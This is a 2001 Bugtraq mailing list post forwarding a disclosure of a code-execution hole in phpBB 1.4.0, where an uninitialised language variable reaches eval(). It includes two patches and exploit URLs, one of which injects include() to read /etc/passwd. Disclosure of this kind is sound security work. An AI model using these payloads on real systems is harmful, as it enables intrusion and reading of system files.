Bugtraq mailing list archives
Re: phpBB 1.4.0 bug leads to easy admin privileges
From: "Joao Gouveia" <tharbad () kaotik org>
Date: Sat, 4 Aug 2001 20:10:18 +0100
Hi all, This is regarding a phpBB security hole found some months ago. Since this one came out, and the other ( beeing a lot worst ) didn't, I thought it might have some interest. This aplies only to phpBB v1.4.0. ----- ----- Original Message ----- From: "UnderSpell" <underspell () accao net> To: <james () phpbb com> Sent: Thursday, May 17, 2001 12:15 PM Subject: Security bug in phpBB
His there! We've recente ( actually not so recently ) discover a way to run any code using phpBB. The aproach was very simple : At a given point you run a eval "eval($l_statsblock);" . Since $l_statsblock is a language var we just have to find a way set up us with a invalid lang file: after login , go to user prefs and
http://hacks.phpbb.com/phpBB/prefs.php?viewemail=1&savecookie=0&sig=0&smile= 0&dishtml=0&disbbcode=0&themes=2&lang=THIS_IS_AN_INVALID_LANG_FILE&save=1&us er=&submit=Gravar+Prefer%EAncias
By this time $l_statsblock is no longer initialized so we can do funny stuff whith them , like : http://hacks.phpbb.com/phpBB/prefs.php?l_statsblock=phpinfo(); or
http://hacks.phpbb.com/phpBB/prefs.php?teste=/etc/passwd&l_statsblock=includ e($teste);
and so on ... we only check the phpinfo against hack forum and the second against my production and stagging boards. You have tow ways to fix this : 1 ) Check if lang file exists ( when tries to include ) --- phpBB-1.4.0/auth.php Wed Apr 25 05:47:59 2001 +++ phpBB/auth.php Thu May 17 12:11:01 2001 @@ -273,16 +273,19 @@ // Include the appropriate language file. if(!strstr($PHP_SELF, "admin")) { - include('language/lang_'.$default_lang.'.'.$phpEx); + $langfile = 'language/lang_'.$default_lang.'.'.$phpEx; } else { if(strstr($PHP_SELF, "topicadmin")) { - include('language/lang_'.$default_lang.'.'.$phpEx); - } else { - include('../language/lang_'.$default_lang.'.'.$phpEx); - } + $langfile ='language/lang_'.$default_lang.'.'.$phpEx; + } else { + $langfile = '../language/lang_'.$default_lang.'.'.$phpEx; + } } + + if ( ! file_exists($langfile) ) { die("Invalid Language");} + else { include($langfile); } // See if translated pictures are available.. $header_image = get_translated_file($header_image); // See if translated pictures are available.. $header_image = get_translated_file($header_image); 2 ) Initialize $l_statsblock before trying to include ( prefered ) --- phpBB-1.4.0/auth.php Wed Apr 25 05:47:59 2001 +++ phpBB/auth.php Thu May 17 11:39:33 2001 @@ -269,6 +269,7 @@ // set vars for all scripts $now_time = time(); $last_visit = $temptime; +$l_statsblock = ''; // Include the appropriate language file. if(!strstr($PHP_SELF, "admin")) Credits for this should go for tharbad () kaotik org and
UnderSpell () accao net .
(A)UnderSpell
--- ----- Original Message ----- From: <kill-9 () modernhackers com> To: <bugtraq () securityfocus com> Sent: Friday, August 03, 2001 8:51 PM Subject: phpBB 1.4.0 bug leads to easy admin privileges
-New phpBB 1.4.x exploit phpBB, is an open source bulletin board created by the phpBB group. Version 1.4.x of phpBB has a variable input validation problem that can lead to limited arbitrary sql querys including gaining administrative access to the board.
(...) Best regards, Joao Gouveia -------------- tharbad () kaotik org
Current thread:
- phpBB 1.4.0 bug leads to easy admin privileges kill-9 (Aug 03)
- Re: phpBB 1.4.0 bug leads to easy admin privileges Paul Burney (Aug 03)
- Re: phpBB 1.4.0 bug leads to easy admin privileges Joao Gouveia (Aug 06)
- <Possible follow-ups>
- Re: phpBB 1.4.0 bug leads to easy admin privileges Kaneda Akira (Aug 08)